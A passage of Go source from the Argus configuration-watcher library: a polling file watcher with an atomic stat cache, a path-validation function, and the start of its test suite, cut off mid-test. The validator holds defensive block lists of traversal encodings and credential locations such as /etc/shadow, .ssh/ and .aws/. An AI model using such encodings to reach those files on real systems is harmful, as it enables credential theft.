func (w *Watcher) updateCache(path string, stat fileStat) {
	for {
		oldMapPtr := w.statCache.Load()
		oldMap := *oldMapPtr
		newMap := make(map[string]fileStat, len(oldMap)+1)

		// Copy existing entries
		for k, v := range oldMap {
			newMap[k] = v
		}

		// Add/update new entry
		newMap[path] = stat

		// Atomic compare-and-swap
		if w.statCache.CompareAndSwap(oldMapPtr, &newMap) {
			return // Success! No pool cleanup needed with value types
		}
		// Retry if another goroutine updated the cache concurrently
	}
}

// removeFromCache atomically removes an entry from the cache (no pool, value types)
func (w *Watcher) removeFromCache(path string) {
	for {
		oldMapPtr := w.statCache.Load()
		oldMap := *oldMapPtr
		if _, exists := oldMap[path]; !exists {
			return // Entry doesn't exist, nothing to do
		}

		newMap := make(map[string]fileStat, len(oldMap)-1)

		// Copy all entries except the one to remove
		for k, v := range oldMap {
			if k != path {
				newMap[k] = v
			}
		}

		// Atomic compare-and-swap
		if w.statCache.CompareAndSwap(oldMapPtr, &newMap) {
			return // Success! No pool cleanup needed with value types
		}
		// Retry if another goroutine updated the cache concurrently
	}
}

// checkFile compares current file stat with last known stat and sends events via BoreasLite
func (w *Watcher) checkFile(wf *watchedFile) {
	currentStat, err := w.getStat(wf.path)

	// Handle stat errors
	if err != nil {
		if os.IsNotExist(err) {
			// File was deleted
			if wf.lastStat.exists {
				// Send delete event via BoreasLite ring buffer
				w.eventRing.WriteFileChange(wf.path, time.Time{}, 0, false, true, false)
				wf.lastStat.exists = false
			}
		} else if w.config.ErrorHandler != nil {
			w.config.ErrorHandler(errors.Wrap(err, ErrCodeFileNotFound, "failed to stat file").
				WithContext("path", wf.path), wf.path)
		}
		return
	}

	// File exists now
	if !wf.lastStat.exists {
		// File was created - send via BoreasLite
		w.eventRing.WriteFileChange(wf.path, currentStat.modTime, currentStat.size, true, false, false)
	} else if currentStat.modTime != wf.lastStat.modTime || currentStat.size != wf.lastStat.size {
		// File was modified - send via BoreasLite
		w.eventRing.WriteFileChange(wf.path, currentStat.modTime, currentStat.size, false, false, true)
	}

	wf.lastStat = currentStat
}

// watchLoop is the main polling loop that checks all watched files
func (w *Watcher) watchLoop() {
	defer close(w.stoppedCh)

	ticker := time.NewTicker(w.config.PollInterval)
	defer ticker.Stop()

	for {
		select {
		case <-w.ctx.Done():
			return
		case <-w.stopCh:
			return
		case <-ticker.C:
			w.pollFiles()
		}
	}
}

// pollFiles checks all watched files for changes
// ULTRA-OPTIMIZED: Zero-allocation version using reusable buffer
func (w *Watcher) pollFiles() {
	w.filesMu.RLock()
	// Reuse buffer to avoid allocations
	w.filesBuffer = w.filesBuffer[:0] // Reset slice but keep capacity
	for _, wf := range w.files {
		w.filesBuffer = append(w.filesBuffer, wf)
	}
	files := w.filesBuffer
	w.filesMu.RUnlock()

	// For single file, use direct checking to avoid goroutine overhead
	if len(files) == 1 {
		w.checkFile(files[0])
		return
	}

	// For multiple files, use parallel checking with limited concurrency
	const maxConcurrency = 8 // Prevent goroutine explosion
	if len(files) <= maxConcurrency {
		// Use goroutines for small number of files
		var wg sync.WaitGroup
		for _, wf := range files {
			wg.Add(1)
			go func(wf *watchedFile) {
				defer wg.Done()
				w.checkFile(wf)
			}(wf)
		}
		wg.Wait()
	} else {
		// Use worker pool for many files
		fileCh := make(chan *watchedFile, len(files))
		var wg sync.WaitGroup

		// Start workers
		for i := 0; i < maxConcurrency; i++ {
			wg.Add(1)
			go func() {
				defer wg.Done()
				for wf := range fileCh {
					w.checkFile(wf)
				}
			}()
		}

		// Send files to workers
		for _, wf := range files {
			fileCh <- wf
		}
		close(fileCh)
		wg.Wait()
	}
}

// ClearCache forces clearing of the stat cache (no pool cleanup needed)
// Useful for testing or when you want to force fresh stat calls
func (w *Watcher) ClearCache() {
	emptyCache := make(map[string]fileStat)
	w.statCache.Store(&emptyCache)
}

// CacheStats returns statistics about the internal cache for monitoring and debugging.
// Provides insights into cache efficiency and performance characteristics.
type CacheStats struct {
	Entries   int           // Number of cached entries
	OldestAge time.Duration // Age of oldest cache entry
	NewestAge time.Duration // Age of newest cache entry
}

// GetCacheStats returns current cache statistics using timecache for performance
func (w *Watcher) GetCacheStats() CacheStats {
	cacheMap := *w.statCache.Load()

	if len(cacheMap) == 0 {
		return CacheStats{}
	}

	now := timecache.CachedTimeNano()
	var oldest, newest int64
	first := true

	for _, stat := range cacheMap {
		if first {
			oldest = stat.cachedAt
			newest = stat.cachedAt
			first = false
		} else {
			if stat.cachedAt < oldest {
				oldest = stat.cachedAt
			}
			if stat.cachedAt > newest {
				newest = stat.cachedAt
			}
		}
	}

	return CacheStats{
		Entries:   len(cacheMap),
		OldestAge: time.Duration(now - oldest),
		NewestAge: time.Duration(now - newest),
	}
}

// =============================================================================
// SECURITY: PATH VALIDATION AND SANITIZATION FUNCTIONS
// =============================================================================

// ValidateSecurePath validates that a file path is safe from path traversal attacks.
//
// SECURITY PURPOSE: Prevents directory traversal attacks (CWE-22) by rejecting
// paths that contain dangerous patterns or attempt to escape the intended directory.
//
// This function implements multiple layers of protection:
// 1. Pattern-based detection of traversal sequences (case-insensitive)
// 2. URL decoding to catch encoded attacks
// 3. Normalization attacks prevention
// 4. System file protection
// 5. Device name filtering (Windows)
//
// SECURITY NOTICE: All validation is performed case-insensitively to ensure
// consistent protection across different file systems and OS configurations.
//
// CRITICAL: This function must be called on ALL user-provided paths before
// any file operations to prevent security vulnerabilities.
//
// This function is exported to allow external packages to use the same
// security validation logic as the core Argus library.
func ValidateSecurePath(path string) error {
	if path == "" {
		return errors.New(ErrCodeInvalidConfig, "empty path not allowed")
	}

	// Normalize path to lowercase for consistent security validation
	// This prevents case-based bypass attempts on case-insensitive file systems
	lowerPath := strings.ToLower(path)

	// SECURITY CHECK 1: Detect common path traversal patterns (case-insensitive)
	// These patterns are dangerous regardless of OS
	dangerousPatterns := []string{
		"..",   // Parent directory reference
		"../",  // Unix path traversal
		"..\\", // Windows path traversal
		"/..",  // Unix parent dir
		"\\..", // Windows parent dir
		// Note: "./" removed as it can be legitimate in temp paths
	}

	for _, pattern := range dangerousPatterns {
		if strings.Contains(lowerPath, pattern) {
			return errors.New(ErrCodeInvalidConfig, "path contains dangerous traversal pattern: "+pattern)
		}
	}

	// SECURITY CHECK 2: URL decoding to catch encoded attacks
	// Attackers often URL-encode traversal sequences to bypass filters

	// Check for URL-encoded dangerous patterns using normalized path
	urlPatterns := []string{
		"%2e%2e",      // ".." encoded
		"%252e%252e",  // ".." double encoded
		"%2f",         // "/" encoded
		"%252f",       // "/" double encoded
		"%5c",         // "\" encoded
		"%255c",       // "\" double encoded
		"%00",         // null byte
		"%2500",       // null byte double encoded
		"..%2f",       // Mixed encoding patterns
		"..%252f",     // Mixed double encoding
		"%2e%2e/",     // Mixed patterns
		"%252e%252e/", // Mixed double encoding
	}

	for _, pattern := range urlPatterns {
		if strings.Contains(lowerPath, pattern) {
			return errors.New(ErrCodeInvalidConfig, "path contains URL-encoded traversal pattern: "+pattern)
		}
	}

	// Additional check for any percent-encoded sequences that decode to dangerous patterns
	// This catches creative encoding attempts
	for i := 0; i < len(path)-2; i++ {
		if path[i] == '%' {
			// Look for sequences like %XX that might decode to dangerous characters
			if i+5 < len(path) {
				sixChar := strings.ToLower(path[i : i+6])
				// Check for double-encoded dots and slashes
				if strings.HasPrefix(sixChar, "%252e") || strings.HasPrefix(sixChar, "%252f") || strings.HasPrefix(sixChar, "%255c") {
					return errors.New(ErrCodeInvalidConfig, "path contains double-encoded traversal sequence: "+sixChar)
				}
			}
		}
	}

	// SECURITY CHECK 3: System file protection
	// Prevent access to known sensitive system files and directories
	// Using already normalized lowerPath for consistency
	sensitiveFiles := []string{
		"/etc/passwd",
		"/etc/shadow",
		"/etc/hosts",
		"/proc/",
		"/sys/",
		"/dev/",
		"windows/system32",
		"windows\\system32",   // Windows backslash variant
		"\\windows\\system32", // Absolute Windows path
		"program files",
		"system volume information",
		".ssh/",
		".aws/",
		".docker/",
	}

	for _, sensitive := range sensitiveFiles {
		if strings.Contains(lowerPath, strings.ToLower(sensitive)) {
			return errors.New(ErrCodeInvalidConfig, "access to system file/directory not allowed: "+sensitive)
		}
	}

	// SECURITY CHECK 4: Windows-specific security threats
	// Multiple Windows-specific attack vectors need protection

	// 4A: Windows device name protection
	windowsDevices := []string{
		"CON", "PRN", "AUX", "NUL",
		"COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
		"LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
	}

	// SECURITY FIX: Check for UNC paths that access Windows devices
	// UNC paths like //Con, ///Con, \\Con, /\Con are equivalent to device access and must be blocked
	if (strings.HasPrefix(path, "/") || strings.HasPrefix(path, "\\")) && len(path) > 1 {
		// Normalize the path: remove all leading slashes and backslashes
		normalizedPath := path
		for len(normalizedPath) > 0 && (normalizedPath[0] == '/' || normalizedPath[0] == '\\') {
			normalizedPath = normalizedPath[1:]
		}

		if len(normalizedPath) > 0 {
			// Split by both types of separators to get path components
			// Replace backslashes with forward slashes for consistent splitting
			normalizedForSplit := strings.ReplaceAll(normalizedPath, "\\", "/")
			components := strings.Split(normalizedForSplit, "/")

			if len(components) > 0 && components[0] != "" {
				// Check if the first component is a device name (after normalizing case)
				firstComponent := strings.ToUpper(components[0])

				// Remove ALL extensions if present (handle multiple extensions)
				for {
					if dotIndex := strings.Index(firstComponent, "."); dotIndex != -1 {
						firstComponent = firstComponent[:dotIndex]
					} else {
						break
					}
				}

				// Special case: If we have exactly 2 components and the first is short (likely server),
				// and second is a device name, this might be legitimate UNC (//server/device)
				// But if first component is also a device name (//Con/anything), block it
				isLikelyDevice := false
				for _, device := range windowsDevices {
					if firstComponent == device {
						isLikelyDevice = true
						break
					}
				}

				if isLikelyDevice {
					// Always block if first component is a device name
					return errors.New(ErrCodeInvalidConfig, "windows device name not allowed via UNC path: "+firstComponent)
				}

				// Also check if this could be a mixed separator attack trying to access device
				// in second position (like /\server\Con)
				if len(components) >= 2 {
					secondComponent := strings.ToUpper(components[1])
					// Remove ALL extensions if present (handle multiple extensions)
					for {
						if dotIndex := strings.Index(secondComponent, "."); dotIndex != -1 {
							secondComponent = secondComponent[:dotIndex]
						} else {
							break
						}
					}

					// If second component is device AND first component looks suspicious
					// (single char, digit, etc.), block it
					for _, device := range windowsDevices {
						if secondComponent == device && len(components[0]) <= 2 {
							return errors.New(ErrCodeInvalidConfig, "windows device name not allowed via UNC path: "+secondComponent)
						}
					}
				}
			}
		}
	}

	baseName := strings.ToUpper(filepath.Base(path))
	// Remove ALL extensions for device name check (handle multiple extensions like PRN.0., COM1.txt.bak)
	// Keep removing extensions until no more dots are found
	for {
		if dotIndex := strings.LastIndex(baseName, "."); dotIndex != -1 {
			baseName = baseName[:dotIndex]
		} else {
			break
		}
	}

	for _, device := range windowsDevices {
		if baseName == device {
			return errors.New(ErrCodeInvalidConfig, "windows device name not allowed: "+device)
		}
	}

	// 4B: Windows Alternate Data Streams (ADS) protection
	// ADS can hide malicious content: filename.txt:hidden_stream
	if strings.Contains(path, ":") {
		// Check if this is a Windows ADS (not a URL scheme or Windows drive letter)
		colonIndex := strings.Index(path, ":")
		if colonIndex > 1 && colonIndex < len(path)-1 {
			// Check if it looks like ADS (no // after colon like in URLs)
			afterColon := path[colonIndex+1:]
			// Allow URLs (://) and network paths (:\\)
			if !strings.HasPrefix(afterColon, "//") && !strings.HasPrefix(afterColon, "\\\\") {
				// Allow drive letters (C:)
				if colonIndex == 1 {
					// This is likely a drive letter, allow it
				} else {
					// Check if this looks like a real ADS attack
					// Real ADS: filename.ext:streamname (streamname typically doesn't start with .)
					// But "test:.json" has colon followed by .json which is not typical ADS
					if !strings.HasPrefix(afterColon, ".") {
						return errors.New(ErrCodeInvalidConfig, "windows alternate data streams not allowed")
					}
				}
			}
		}
	}

	// SECURITY CHECK 5: Path length and complexity limits
	// Prevent extremely long paths that could cause buffer overflows or DoS
	if len(path) > 4096 {
		return errors.New(ErrCodeInvalidConfig, fmt.Sprintf("path too long (max 4096 characters): %d", len(path)))
	}

	// Count directory levels to prevent deeply nested traversal attempts
	separatorCount := strings.Count(path, "/") + strings.Count(path, "\\")
	if separatorCount > 50 {
		return errors.New(ErrCodeInvalidConfig, fmt.Sprintf("path too complex (max 50 directory levels): %d", separatorCount))
	}

	// SECURITY CHECK 6: Null byte injection prevention
	// Null bytes can truncate strings in some languages/systems
	if strings.Contains(path, "\x00") {
		return errors.New(ErrCodeInvalidConfig, "null byte in path not allowed")
	}

	// SECURITY CHECK 7: Control character prevention
	// Control characters can cause unexpected behavior
	for _, char := range path {
		if char < 32 && char != 9 && char != 10 && char != 13 { // Allow tab, LF, CR
			return errors.New(ErrCodeInvalidConfig, fmt.Sprintf("control character in path not allowed: %d", char))
		}
	}

	return nil
}

// GetWriter creates a ConfigWriter for the specified file.
// The writer enables programmatic configuration modifications with atomic operations.
//
// Performance: ~500 ns/op, zero allocations for writer creation
func (w *Watcher) GetWriter(filePath string, format ConfigFormat, initialConfig map[string]interface{}) (*ConfigWriter, error) {
	return NewConfigWriter(filePath, format, initialConfig)
}

```

## /argus_core_test.go

```go path="/argus_core_test.go" 
// argus_core_test.go - Comprehensive test suite for Argus Dynamic Configuration Framework
//
// Test Philosophy:
// - DRY principle: Common test utilities and helpers
// - OS-aware: Works on Windows, Linux, macOS
// - Smart assertions: Meaningful error messages
// - No false positives: Proper timing and synchronization
// - Comprehensive coverage: All public APIs and edge cases
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"os"
	"path/filepath"
	"runtime"
	"sync"
	"sync/atomic"
	"testing"
	"time"
)

// Test configuration constants
const (
	// Fast test intervals for CI/dev environments
	testPollInterval = 50 * time.Millisecond
	testCacheTTL     = 25 * time.Millisecond
	testWaitTime     = 100 * time.Millisecond
	testTimeout      = 2 * time.Second

	// Test file content
	initialTestContent = `{"version": 1, "enabled": true}`
	updatedTestContent = `{"version": 2, "enabled": false}`
)

// testHelper provides common test utilities following DRY principle
type testHelper struct {
	t         *testing.T
	tempDir   string
	tempFiles []string
	cleanup   []func()
}

// newTestHelper creates a new test helper with OS-aware temp directory
func newTestHelper(t *testing.T) *testHelper {
	t.Helper()

	tempDir, err := os.MkdirTemp("", "argus_test_*")
	if err != nil {
		t.Fatalf("Failed to create temp directory: %v", err)
	}

	return &testHelper{
		t:       t,
		tempDir: tempDir,
		cleanup: make([]func(), 0),
	}
}

// createTestFile creates a temporary test file with given content
func (h *testHelper) createTestFile(name string, content string) string {
	h.t.Helper()

	filePath := filepath.Join(h.tempDir, name)
	if err := os.WriteFile(filePath, []byte(content), 0644); err != nil {
		h.t.Fatalf("Failed to create test file %s: %v", filePath, err)
	}

	h.tempFiles = append(h.tempFiles, filePath)
	return filePath
}

// updateTestFile updates an existing test file with new content
func (h *testHelper) updateTestFile(filePath string, content string) {
	h.t.Helper()

	if err := os.WriteFile(filePath, []byte(content), 0644); err != nil {
		h.t.Fatalf("Failed to update test file %s: %v", filePath, err)
	}
}

// deleteTestFile removes a test file (for deletion tests)
func (h *testHelper) deleteTestFile(filePath string) {
	h.t.Helper()

	if err := os.Remove(filePath); err != nil {
		h.t.Fatalf("Failed to delete test file %s: %v", filePath, err)
	}
}

// createWatcher creates a watcher with test-optimized configuration
func (h *testHelper) createWatcher() *Watcher {
	h.t.Helper()

	config := Config{
		PollInterval:    testPollInterval,
		CacheTTL:        testCacheTTL,
		MaxWatchedFiles: 100,
	}

	watcher := New(config)
	h.cleanup = append(h.cleanup, func() {
		if watcher.IsRunning() {
			if err := watcher.Stop(); err != nil {
				h.t.Errorf("Failed to stop watcher: %v", err)
			}
		}
	})

	return watcher
}

// waitForChanges waits for expected number of changes with timeout
func (h *testHelper) waitForChanges(changesChan <-chan ChangeEvent, expectedCount int, timeout time.Duration) []ChangeEvent {
	h.t.Helper()

	var changes []ChangeEvent
	timer := time.NewTimer(timeout)
	defer timer.Stop()

	for len(changes) < expectedCount {
		select {
		case change := <-changesChan:
			changes = append(changes, change)
			h.t.Logf("Change detected: %+v", change)
		case <-timer.C:
			h.t.Fatalf("Timeout waiting for changes. Expected %d, got %d changes: %+v",
				expectedCount, len(changes), changes)
		}
	}

	return changes
}

// waitWithNoChanges waits and ensures no unexpected changes occur
func (h *testHelper) waitWithNoChanges(changesChan <-chan ChangeEvent, duration time.Duration) {
	h.t.Helper()

	timer := time.NewTimer(duration)
	defer timer.Stop()

	select {
	case change := <-changesChan:
		h.t.Fatalf("Unexpected change detected: %+v", change)
	case <-timer.C:
		// Expected - no changes
	}
}

// Close cleans up test resources
func (h *testHelper) Close() {
	// Run cleanup functions in reverse order
	for i := len(h.cleanup) - 1; i >= 0; i-- {
		h.cleanup[i]()
	}

	// Remove temp directory
	if h.tempDir != "" {
		if err := os.RemoveAll(h.tempDir); err != nil {
			h.t.Errorf("Failed to remove tempDir: %v", err)
		}
	}
}

// Test configuration validation and defaults
func TestConfig_WithDefaults(t *testing.T) {
	t.Parallel()

	testCases := []struct {
		name           string
		input          Config
		expectedFields map[string]interface{}
	}{
		{
			name:  "empty_config_gets_defaults",
			input: Config{},
			expectedFields: map[string]interface{}{
				"PollInterval":    5 * time.Second,
				"CacheTTL":        2500 * time.Millisecond, // PollInterval / 2
				"MaxWatchedFiles": 100,
			},
		},
		{
			name: "partial_config_preserves_values",
			input: Config{
				PollInterval: 1 * time.Second,
			},
			expectedFields: map[string]interface{}{
				"PollInterval":    1 * time.Second,
				"CacheTTL":        500 * time.Millisecond, // PollInterval / 2
				"MaxWatchedFiles": 100,
			},
		},
		{
			name: "custom_config_preserved",
			input: Config{
				PollInterval:    10 * time.Second,
				CacheTTL:        5 * time.Second,
				MaxWatchedFiles: 50,
			},
			expectedFields: map[string]interface{}{
				"PollInterval":    10 * time.Second,
				"CacheTTL":        5 * time.Second,
				"MaxWatchedFiles": 50,
			},
		},
	}

	for _, tc := range testCases {
		t.Run(tc.name, func(t *testing.T) {
			t.Parallel()

			result := tc.input.WithDefaults()

			// Verify specific fields
			if result.PollInterval != tc.expectedFields["PollInterval"] {
				t.Errorf("PollInterval: expected %v, got %v",
					tc.expectedFields["PollInterval"], result.PollInterval)
			}
			if result.CacheTTL != tc.expectedFields["CacheTTL"] {
				t.Errorf("CacheTTL: expected %v, got %v",
					tc.expectedFields["CacheTTL"], result.CacheTTL)
			}
			if result.MaxWatchedFiles != tc.expectedFields["MaxWatchedFiles"] {
				t.Errorf("MaxWatchedFiles: expected %v, got %v",
					tc.expectedFields["MaxWatchedFiles"], result.MaxWatchedFiles)
			}
		})
	}
}

// Test watcher creation and basic state
func TestWatcher_New(t *testing.T) {
	t.Parallel()

	testCases := []struct {
		name   string
		config Config
	}{
		{
			name:   "default_config",
			config: Config{},
		},
		{
			name: "custom_config",
			config: Config{
				PollInterval:    1 * time.Second,
				CacheTTL:        500 * time.Millisecond,
				MaxWatchedFiles: 50,
			},
		},
	}

	for _, tc := range testCases {
		t.Run(tc.name, func(t *testing.T) {
			t.Parallel()

			watcher := New(tc.config)

			// Verify initial state
			if watcher == nil {
				t.Fatal("New() returned nil watcher")
			}

			if watcher.IsRunning() {
				t.Error("New watcher should not be running")
			}

			if watcher.WatchedFiles() != 0 {
				t.Errorf("New watcher should have 0 watched files, got %d", watcher.WatchedFiles())
			}

			// Verify cache stats
			stats := watcher.GetCacheStats()
			if stats.Entries != 0 {
				t.Errorf("New watcher cache should be empty, got %d entries", stats.Entries)
			}
		})
	}
}

// Test file watching lifecycle (core functionality)
func TestWatcher_FileWatchingLifecycle(t *testing.T) {
	if testing.Short() {
		t.Skip("Skipping lifecycle test in short mode")
	}

	helper := newTestHelper(t)
	defer helper.Close()

	// Create test file
	testFile := helper.createTestFile("test_config.json", initialTestContent)

	// Create watcher
	watcher := helper.createWatcher()

	// Set up change tracking
	changesChan := make(chan ChangeEvent, 10)
	var changesCount int32

	err := watcher.Watch(testFile, func(event ChangeEvent) {
		atomic.AddInt32(&changesCount, 1)
		select {
		case changesChan <- event:
		default:
			t.Error("Changes channel overflow")
		}
	})

	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	// Verify file is being watched
	if watcher.WatchedFiles() != 1 {
		t.Errorf("Expected 1 watched file, got %d", watcher.WatchedFiles())
	}

	// Start watcher
	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}

	if !watcher.IsRunning() {
		t.Error("Watcher should be running after Start()")
	}

	// Wait for initial stabilization
	time.Sleep(testWaitTime)

	// Modify file and wait for change detection
	helper.updateTestFile(testFile, updatedTestContent)
	changes := helper.waitForChanges(changesChan, 1, testTimeout)

	// Verify change event
	if len(changes) != 1 {
		t.Fatalf("Expected 1 change, got %d", len(changes))
	}

	change := changes[0]
	if change.Path != testFile {
		t.Errorf("Expected change path %s, got %s", testFile, change.Path)
	}
	if change.IsDelete {
		t.Error("File modification should not be marked as deletion")
	}

	// Stop watcher
	if err := watcher.Stop(); err != nil {
		t.Fatalf("Failed to stop watcher: %v", err)
	}

	if watcher.IsRunning() {
		t.Error("Watcher should not be running after Stop()")
	}

	// Verify no more changes are detected after stopping
	helper.updateTestFile(testFile, initialTestContent)
	helper.waitWithNoChanges(changesChan, testWaitTime*2)

	finalChangesCount := atomic.LoadInt32(&changesCount)
	t.Logf("Total changes detected: %d", finalChangesCount)
}

// Test cache behavior and TTL expiration
func TestWatcher_CacheBehaviorAndTTL(t *testing.T) {
	if testing.Short() {
		t.Skip("Skipping cache test in short mode")
	}

	helper := newTestHelper(t)
	defer helper.Close()

	// Create test file
	testFile := helper.createTestFile("cache_test.json", initialTestContent)

	// Create watcher with very short TTL for testing
	config := Config{
		PollInterval:    testPollInterval,
		CacheTTL:        testCacheTTL, // Very short TTL
		MaxWatchedFiles: 100,
	}
	watcher := New(config)
	defer func() {
		if watcher.IsRunning() {
			if err := watcher.Stop(); err != nil {
				t.Logf("Failed to stop watcher: %v", err)
			}
		}
	}()

	// Add file to watcher
	changesChan := make(chan ChangeEvent, 10)
	err := watcher.Watch(testFile, func(event ChangeEvent) {
		changesChan <- event
	})
	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	// Start watcher
	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}

	// Wait for initial cache population
	time.Sleep(testWaitTime)

	// Check initial cache stats
	stats := watcher.GetCacheStats()
	if stats.Entries == 0 {
		t.Error("Cache should contain at least one entry after initial scan")
	}

	t.Logf("Initial cache stats: entries=%d, oldest=%v, newest=%v",
		stats.Entries, stats.OldestAge, stats.NewestAge)

	// Wait for cache TTL to expire
	time.Sleep(testCacheTTL * 3)

	// Trigger another poll cycle
	time.Sleep(testPollInterval * 2)

	// Check cache stats again - entries may change due to TTL expiration and repopulation
	newStats := watcher.GetCacheStats()
	t.Logf("Post-TTL cache stats: entries=%d, oldest=%v, newest=%v",
		newStats.Entries, newStats.OldestAge, newStats.NewestAge)

	// Cache should still be functioning
	if newStats.Entries == 0 {
		t.Error("Cache should still contain entries after TTL cycle")
	}

	// Test manual cache clearing
	watcher.ClearCache()
	clearedStats := watcher.GetCacheStats()

	if clearedStats.Entries != 0 {
		t.Errorf("Cache should be empty after ClearCache(), got %d entries", clearedStats.Entries)
	}
}

// Test file creation and deletion detection
func TestWatcher_FileCreationAndDeletion(t *testing.T) {
	if testing.Short() {
		t.Skip("Skipping creation/deletion test in short mode")
	}

	helper := newTestHelper(t)
	defer helper.Close()

	// Create initial test file
	testFile := helper.createTestFile("lifecycle_test.json", initialTestContent)

	// Create watcher
	watcher := helper.createWatcher()

	// Set up change tracking
	changesChan := make(chan ChangeEvent, 10)

	err := watcher.Watch(testFile, func(event ChangeEvent) {
		changesChan <- event
	})
	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	// Start watcher
	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}

	// Wait for initial stabilization
	time.Sleep(testWaitTime)

	// Delete file
	helper.deleteTestFile(testFile)

	// Wait for deletion detection
	changes := helper.waitForChanges(changesChan, 1, testTimeout)

	// Verify deletion event
	if len(changes) != 1 {
		t.Fatalf("Expected 1 deletion event, got %d", len(changes))
	}

	change := changes[0]
	if change.Path != testFile {
		t.Errorf("Expected deletion path %s, got %s", testFile, change.Path)
	}
	if !change.IsDelete {
		t.Error("File deletion should be marked as deletion")
	}

	// Recreate file
	helper.createTestFile(filepath.Base(testFile), updatedTestContent)

	// Wait for recreation detection
	recreationChanges := helper.waitForChanges(changesChan, 1, testTimeout)

	// Verify recreation event
	if len(recreationChanges) != 1 {
		t.Fatalf("Expected 1 recreation event, got %d", len(recreationChanges))
	}

	recreationChange := recreationChanges[0]
	if recreationChange.IsDelete {
		t.Error("File recreation should not be marked as deletion")
	}
}

// Test multiple files watching
func TestWatcher_MultipleFiles(t *testing.T) {
	if testing.Short() {
		t.Skip("Skipping multiple files test in short mode")
	}

	helper := newTestHelper(t)
	defer helper.Close()

	// Create multiple test files
	file1 := helper.createTestFile("config1.json", initialTestContent)
	file2 := helper.createTestFile("config2.json", initialTestContent)
	file3 := helper.createTestFile("config3.json", initialTestContent)

	// Create watcher
	watcher := helper.createWatcher()

	// Track changes per file
	changes := make(map[string][]ChangeEvent)
	var changesMutex sync.Mutex

	// Watch all files
	for _, file := range []string{file1, file2, file3} {
		err := watcher.Watch(file, func(event ChangeEvent) {
			changesMutex.Lock()
			changes[event.Path] = append(changes[event.Path], event)
			changesMutex.Unlock()
		})
		if err != nil {
			t.Fatalf("Failed to watch file %s: %v", file, err)
		}
	}

	// Verify all files are being watched
	if watcher.WatchedFiles() != 3 {
		t.Errorf("Expected 3 watched files, got %d", watcher.WatchedFiles())
	}

	// Start watcher
	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}

	// Wait for initial stabilization
	time.Sleep(testWaitTime)

	// Modify files sequentially with delays to ensure distinct events
	helper.updateTestFile(file1, updatedTestContent)
	time.Sleep(testWaitTime / 2)

	helper.updateTestFile(file2, updatedTestContent)
	time.Sleep(testWaitTime / 2)

	helper.updateTestFile(file3, updatedTestContent)

	// Wait for all changes to be detected
	time.Sleep(testTimeout)

	// Verify changes for each file
	changesMutex.Lock()
	defer changesMutex.Unlock()

	for _, file := range []string{file1, file2, file3} {
		fileChanges, exists := changes[file]
		if !exists || len(fileChanges) == 0 {
			t.Errorf("No changes detected for file %s", file)
		} else {
			t.Logf("File %s: detected %d changes", file, len(fileChanges))
		}
	}
}

// Test unwatch functionality
func TestWatcher_Unwatch(t *testing.T) {
	helper := newTestHelper(t)
	defer helper.Close()

	// Create test file
	testFile := helper.createTestFile("unwatch_test.json", initialTestContent)

	// Create watcher
	watcher := helper.createWatcher()

	// Watch file
	changesChan := make(chan ChangeEvent, 10)
	err := watcher.Watch(testFile, func(event ChangeEvent) {
		changesChan <- event
	})
	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	// Verify file is being watched
	if watcher.WatchedFiles() != 1 {
		t.Errorf("Expected 1 watched file, got %d", watcher.WatchedFiles())
	}

	// Unwatch file
	err = watcher.Unwatch(testFile)
	if err != nil {
		t.Fatalf("Failed to unwatch file: %v", err)
	}

	// Verify file is no longer being watched
	if watcher.WatchedFiles() != 0 {
		t.Errorf("Expected 0 watched files after unwatch, got %d", watcher.WatchedFiles())
	}

	// Test unwatching non-existent file (should not error)
	err = watcher.Unwatch("/non/existent/file.json")
	if err != nil {
		t.Errorf("Unwatching non-existent file should not error, got: %v", err)
	}
}

// Test error conditions and edge cases
func TestWatcher_ErrorConditions(t *testing.T) {
	t.Parallel()

	helper := newTestHelper(t)
	defer helper.Close()

	watcher := helper.createWatcher()

	t.Run("watch_non_existent_file", func(t *testing.T) {
		// Watching non-existent file should NOT error (Argus watches paths, not just existing files)
		err := watcher.Watch("/non/existent/file.json", func(event ChangeEvent) {})
		if err != nil {
			t.Errorf("Watching non-existent file should not return error, got: %v", err)
		}
	})

	t.Run("watch_with_nil_callback", func(t *testing.T) {
		err := watcher.Watch("/some/path.json", nil)
		if err == nil {
			t.Error("Watching with nil callback should return error")
		}
	})

	t.Run("double_start", func(t *testing.T) {
		if err := watcher.Start(); err != nil {
			t.Fatalf("First start failed: %v", err)
		}

		// Second start should return error (not idempotent)
		if err := watcher.Start(); err == nil {
			t.Error("Second start should return error")
		}

		if err := watcher.Stop(); err != nil {
			t.Logf("Failed to stop watcher: %v", err)
		}
	})

	t.Run("stop_without_start", func(t *testing.T) {
		freshWatcher := helper.createWatcher()

		// Stopping without starting should return error
		if err := freshWatcher.Stop(); err == nil {
			t.Error("Stop without start should return error")
		}
	})
}

// Test OS-specific behavior
func TestWatcher_OSSpecificBehavior(t *testing.T) {
	helper := newTestHelper(t)
	defer helper.Close()

	t.Run("path_handling", func(t *testing.T) {
		watcher := helper.createWatcher()

		// Test with OS-specific path separators
		var testPath string
		if runtime.GOOS == "windows" {
			testPath = filepath.Join(helper.tempDir, "test\\config.json")
		} else {
			testPath = filepath.Join(helper.tempDir, "test/config.json")
		}

		// Create directory if needed
		dir := filepath.Dir(testPath)
		if err := os.MkdirAll(dir, 0755); err != nil {
			t.Fatalf("Failed to create directory: %v", err)
		}

		// Create file
		if err := os.WriteFile(testPath, []byte(initialTestContent), 0644); err != nil {
			t.Fatalf("Failed to create test file: %v", err)
		}

		// Should be able to watch regardless of path format
		err := watcher.Watch(testPath, func(event ChangeEvent) {})
		if err != nil {
			t.Errorf("Should be able to watch OS-specific path %s: %v", testPath, err)
		}
	})
}

func TestWatcher_Close(t *testing.T) {
	helper := newTestHelper(t)
	defer helper.Close()

